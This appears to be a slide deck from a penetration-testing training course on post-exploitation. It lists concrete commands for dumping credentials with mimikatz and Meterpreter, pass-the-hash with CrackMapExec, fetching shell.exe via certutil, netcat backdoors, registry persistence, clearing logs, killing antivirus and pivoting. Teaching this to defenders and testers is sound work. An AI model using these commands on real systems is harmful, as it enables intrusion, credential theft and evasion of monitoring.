Practical White Hat Hacker Training - Post Exploitation

www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #6
Post Explotation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr

www.prismacsi.com
2
Topics
• Domain Exploitation
• Meterpreter
• Crackmapexec
• Empire
• Local Privilege Escalation
• Persistence
• Pivoting

www.prismacsi.com
3
Domain Exploitation
• What’s an Active Directory?

www.prismacsi.com
4
Domain Exploitation
• To be able to penetrate all systems :
• Vulnerabilities are used to penetrate target systems and user or session information is
gathered.
• Systems can be penetrated thanks to bruteforce attacks.
• An attempt to penetrate additional systems can be done using files containing detailed
information about a given system .
• As a result, the path to Domain Admin opens.
• The control is in your hands!

www.prismacsi.com
5
Domain Exploitation
• Generally when a windows system is penetrated;
• SAM ve SYSTEM files are accessed.
• %WINDIR%system32configSAM
• %WINDIR%system32configSYSTEM
• Samdump2 is obtained using hashes.
• Or hashdump is run on a metasploit session.
• Obtained hashes are cracked or pass-the-hash method is used to try the hashes through
the entire network.

www.prismacsi.com
6
Mimikatz - Demo
• Plain text passwords can be obtained with Mimikatz from the memory.
• https://github.com/gentilkiwi/mimikatz
• mimikatz # privilege::debug
• mimikatz # sekurlsa::logonpasswords

www.prismacsi.com
7
Browser Passwords
• There are several browser modules available on Metasploit.
• run post/windows/gather/enum_chrome
• run post/multi/gather/firefox_creds
• git clone https://github.com/Unode/firefox_decrypt.git
• Nirsoft software can be used
• https://www.nirsoft.net/utils/web_browser_password.html

www.prismacsi.com
8
MS14-068 Vulnerability
• Allowing access to Domain Admin authority is a critical level vulnerability.
• Kerberos vulnerability
• PyKEK script can be used for a simple exploit. (https://github.com/mubix/pykek )

www.prismacsi.com
9
Meterpreter
• It’s an advanced payload found in
Metasploit that can be used to manually,
thanks to post exploits, perform a number
of actions quickly.
• Can be though of as Superman.
• Post exploitation is ensuring the admin
privilege is never lost.

www.prismacsi.com
10
Post Exploitation
• Refers to actions after an exploit.
• Target-specific research techniques
• Steps to obtain password summaries
• Discovering configuration files
• Action of identifying domain users
• Obtaining passwords from the memory
• Inventory extraction

www.prismacsi.com
11
Post Exploitation - Demo
• Meterpreter Basic Commands
• sysinfo – Used to obtain information about the system
• background – Moves sessions to the background
• getuid – Used to obtain uid information
• upload – Uploads files to the system
• download – Downloads files from the system

www.prismacsi.com
12
• screenshot – Obtains screeshots
• ps – lists running processes
• migrate – Used to move into another running process to maintain persistence
• getsystem – Used for privilege escalation

www.prismacsi.com
13
• Hashdump – obtains hashes of user information
• run hashdump – runs the hashdump post exploit
• record_mic – used to record audio
• webcam_snip 1 – activates a camera on the system if there is any and obtains images.

www.prismacsi.com
14
• Listening to target system network traffic using Meterpreter.
• use sniffer – executes/runs the sniffer.
• sniffer_interfaces – shows interfaces.
• sniffer_start 3- records packets for interface number 3.
• sniffer_dump 3 /tmp/dump.pcap – Keep the traffic record received for interface 3

www.prismacsi.com
15
• The other Meterpreter commands
• enum_firefox – Firefox browser is used to draw data if it is installed in the system
• clearev – used to delete logs
• killav – used to shut down antiviruses
• run get_application_list – lists all the applications installed on the system
• run hostedit -e 10.0.1.5,facebook.com – Sir how can I hack facebook accounts? J
• enable_rdp – Used to activate the RDP service.

www.prismacsi.com
16
• Meterpreter Post Exploit Using
• run post/<TAB>
• use post/windows/gather/enum_domain – Used for domain enumeration.
• run post/windows/gather/enum_applications – discovers applications installed on the system.
• run post/windows/gather/credentials/winscp – Gets the passwords from the winscp application
installed on the system.

www.prismacsi.com
17
• Commands used for privilege escalation
• getsystem – If there is a way to access the NT AUTHORITY System privileges on the
system, it makes you the most authoritative user by using that way.
• bypass_uac – used to bypass UAC.

www.prismacsi.com
18
• Meterpreter special modules
• incognito – it is life <3
• use incognito – activates incognito mode
• list_tokens – lists the tokens available on the system
• impersonate_token – allows a user to impersonate the tokens available on the
system
• When you capture the domain admin tokens you can escalate your privileges by using
incognito.

www.prismacsi.com
19
Post Exploitation
• Empire is a post-exploitation tool that uses PowerShell
and Python.
• Includes flexible and cryptic security structure in modules
to be used on target systems in the post-exploitation
stage.
• If the system uses a security measure such as an anti-
virus, Empire can bypass this because it uses PowerShell.

www.prismacsi.com
20
Post Exploitation
• Empire has three main features.
• We use these features and the modules they include in the
post-exploitation process.
• They are:
• Listeners
• Stagers
• Agents

www.prismacsi.com
21
Post Exploitation
• The first thing we can do is start a listener to get the
shell through Empire just like in Metasploit.
• With the listeners command, we enter the listeners
menu and all the active listeners are listed.
• After selecting our listener and adjusting the settings, we
activate the listener with the execute command.

www.prismacsi.com
22
Empire - Demo

www.prismacsi.com
23
Post Exploitation
• After starting a listener, the Empire tool contains various
stagers that will send it a connection and enable the
listener to connect to the target system.
• usestager <tab> command lists appropriate stagers and
after selecting one suitable for our purpose and
performing the necessary configurations, the execute
command is used to run it.

www.prismacsi.com
24
Empire - Demo

www.prismacsi.com
25
Empire - Demo

www.prismacsi.com
26
Post Exploitation
• After the listener is started and the stager is run in the
target system, a warning is received from the agents
module on the connection opened.
• agents command is used to navigate to the menu.
• To activate the opened connection,
interact <connection-name> command is used.

www.prismacsi.com
27
Empire - Demo

www.prismacsi.com
28
Post Exploitation - CME
• Crackmapexec (CME)
• It is like a Swiss Army Knife
• There are a lot of features available to speed up your network-based attacks.
• With a single command you can execute pass the hash attacks on the whole network and use
the tokens available with mimikatz to perform memory dumps e.tc

www.prismacsi.com
29
Post Exploitation – CME – Demo
• You can scan the entire network with a username and password.
• crackmapexec smb 10.0.1.0/24 -u Administrator-p Password123!
• You can perform a Pass the Hash attack.
• crackmapexec smb 10.0.1.0/24 -u Administrator -H
E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949
• You can run mimikatz on all the systems that you have successfully penetrated.
• crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz

www.prismacsi.com
30
Post Exploitation – Dfile Transfer
• After penetrating a system, you may not have capable agents like meterpreter at your disposal
to perform file transfer. You can use the following commands to transfer files within the shell
you already own.
• Python 2 :
• Start service: python -m SimpleHTTPServer 8000
• Get with client: wget http://10.0.1.5:8000/file
• Python 3 :
• Start service : python –m http.server 8000
• Get with client : wget http://10.0.1.5:8000/file

www.prismacsi.com
31
Post Exploitation – File Transfer
• You can also perform file transfer after starting the Apache service on your own machine.
• Caution! You may not be able to get raw content if the programming language is present on the
system (Examole:php)
• Start service: service apache2 start
• Get with the client: wget http://10.0.1.5
• It can also be done with PHP.
• Start service: php -S 0.0.0.0:8000
• Get with the client: wget http://10.0.1.5:8000

www.prismacsi.com
32
Post Exploitation – File Transfer
• If the system you hacked is Windows?
• You can use bitsadmin.
• bitsadmin /transfer n http://domain/file c:%homepath%file
• You can also use certutil
• certutil.exe -urlcache -split -f "http://10.10.15.76:88/shell.exe"
• You can also transfer files with nc. If nc binary is not present in the target system upload and
run it.
• nc –l 1337 > filename
• nc 10.0.1.6 1337 < filename
• The method of use may vary with the nc version. For example while specifying the port some
versions may also require –p parameter.
• Example: nc –l –p 1337

www.prismacsi.com
33
Privilege Escalation Attacks
• There are multiple privilege groups on the system.
• For Linux and MacOS root is the user with the highest privileges while for Windows it is the Administrator
user.
• With privilege escalation attacks any user can get access to a privileged user’s credentials.
• Local Exploits!

www.prismacsi.com
34
• Why do we need them?
• To read and write on sensitive files in the system
• To maintain persistence on the system
• To seize the system with full privileges
• For advanced monitoring of the system

www.prismacsi.com
35
• Linux Privilege Escalation attack types
• Kernel exploits
• Exploitation of services running with root authority
• Exploitation of programs with Suid-bit privileges
• Exploitation of users with sudo rights
• Exploitation of cron-job applications with configuration errors.

www.prismacsi.com
36
• Kernel Exploits
• Kernel exploits are programs that allow scripts to be run with elevated privileges by using
vulnerabilities in the Linux kernel (kernel).
• A successful kernel exploit usually allows the user to run commands with super user privileges
(#root).
• For an exploit to work on a target system, there has to be a machine that runs a vulnerable kernel
version and a connection to deploy the exploit on that machine. We also have to be able to execute
the exploit once it is deployed on the target system.

www.prismacsi.com
37
• CAUTION!
• Kernel exploits should always be used as a last resort. This is because most of the exloits
found online are not stable and may lead to crashing of the system on which they are run.
The exploits may also leave traces and logs on the target system.

www.prismacsi.com
38

www.prismacsi.com
39
• Exploiting services running with root privileges
• Exploiting any service that works with root privileges always results in a root shell. Therefore, you
should always check the services that are running on your system, see if they run with root privilege. If
unnecessary then do not run them with root authority.

www.prismacsi.com
40

www.prismacsi.com
41
• SUID Bit Exploit
• SUID (Set User ID) is a Linux feature for running a program with specified user privileges. For
example, the ping command should always work with root privileges to open network sockets.
Therefore, any system on which it is installed automatically has the SUID permission with the
privileges of the root user. In this way each user can use the ping command.

www.prismacsi.com
42

www.prismacsi.com
43

www.prismacsi.com
44
• Sudo Privilege Exploitation
• If any sudo user credentials have been accessed then any command can be run with root privileges
by using the user's sudo privileges.

www.prismacsi.com
45

www.prismacsi.com
46
• Cronjob Exploit
• If a script or binary can be written as a cron-job, we can obtain root shell by editing the script or
binary.

www.prismacsi.com
47

www.prismacsi.com
48
• Recommendations
• First scanning target systems with scripted tools like LinEnum gives us a lot of information about the
system.
• It is a good idea to comprehensively search the target system, as from past experiences, some users
have been known to store credentials in .txt form found in arbitrary folders in the computer.
• In the event that credentials are discovered, a privilege escalation attack attempt may become
needless.

www.prismacsi.com
49
• Windows privilege escalation attack types
• Windows Kernel Exploit
• Migration with Meterpreter
• Stored credentials
• Domain Exploitation

www.prismacsi.com
50

www.prismacsi.com
51
• Automatically scans the target system to reveal patched vulnerabilities.

www.prismacsi.com
52
• It shows vulnerabilities by automatically scanning the target system.

www.prismacsi.com
53
• With this module, we can capture the hash of the passwords of users in the target system.

www.prismacsi.com
54
• With this module, you can escalate your privilege by switching to any process that runs with Administrator
User privileges on the target system.

www.prismacsi.com
55
• Privesc_Check Script
• https://github.com/pentestmonkey/windows-privesc-check

www.prismacsi.com
56
Persistence
• Persistence is a method that ensures a permanent presence in the target system after receiving a shell. This
can be any script or backdoor that has been injected into a running process. The rest is up to a hackers
imagination.

www.prismacsi.com
57
Persistence
• Technique - Backdoor
• Backdoors are the first and easiest methods that come to mind.
• Many of these can easily be accessed from online information security communities.
• The downside is that backdoors can easily be detected.

www.prismacsi.com
58
Persistence
• Techniques - Direct Code Injection
• Adding malicious code without damaging already running applications.
• Since a new application is not executed and injection is only performed on an already running
application, detection is almost impossible.
• The downside is that the persistence is lost when the system is rebooted.

www.prismacsi.com
59
Persistence
• Metasploit – Persistence Module
• After receiving the meterpreter shell on the target system, the run persistence command is executed by
adjusting the necessary settings. In this manner metasploit automatically places a backdoor on the
system. Later on a shell can be retrieved from the specified IP address and port at any time.

www.prismacsi.com
60
Persistence

www.prismacsi.com
61
Persistence
• s4u_persistence module
• Creates a scheduled task and the
shell can always be retrieved
thanks to this scheduled task.

www.prismacsi.com
62
Persistence
• registry_persistence module
• This module creates a payload that runs during boot and embeds it in the system. Thus the system runs
payloads every time the system is rebooted and the shell can be retrieved.

www.prismacsi.com
63
Persistence
• Netcat Use
• Netcat is a network tool for reading and writing files using TCP / IP protocol. Can be used to maintain
persistence in the target system.
• First the nc.exe file is uploaded to the target system.

www.prismacsi.com
64
Persistence
• Netcat Use
• The registry value is then set to run nc.exe.
• Firewall rules are added to enable the target system to run nc.exe file and the firewall is
disabled.

www.prismacsi.com
65
Persistence
• Netcat use

www.prismacsi.com
66
Persistence
• Netcat use
• We now have a backdoor in the system. Using Netcat we can get shell from the target
system whenever we want.
• nc –lvp 10.0.0.55 1337

www.prismacsi.com
67
Pivoting
• Imagine a corporate structure.
• There is an open server and this server is connected with
other internal systems.
• You have infiltrated this server from the outside and you
want to have access to the internal network as well.
• This is exactly what is referred to as pivoting.

www.prismacsi.com
68
Pivoting
• You can use tunneling techniques to perform pivoting.
• If the target institution has a proxy server, then you have pivoting resources in your hands.
• SSH tunneling techniques can be used
• Shuttle is the best tool
• A poor man’s vpn over SSH J
• sudo apt-get install sshuttle
• sshuttle -r root@ipaddress 0.0.0.0/0 -vv

www.prismacsi.com
69
Pivoting with Metasploit
• You can also use the agent meterpreter in Metasploit to perform pivoting.
• You first have to add a routing.
• run autoroute -s network/subnet
• run autoroute –p : you can check the rules you have added.
• You may want to perform port fowarding.
• portfwd add -l 88 -p 80-r ipaddress
• Firefox -> ipaddress:88

www.prismacsi.com
70
Demo

www.prismacsi.com
71
Questions?

www.prismacsi.com
72
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
Contacts

Practical White Hat Hacker Training - Post Exploitation

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Practical White Hat Hacker Training - Post Exploitation

Similar to Practical White Hat Hacker Training - Post Exploitation (20)

More from PRISMA CSI

More from PRISMA CSI (12)

Recently uploaded

Recently uploaded (20)

Practical White Hat Hacker Training - Post Exploitation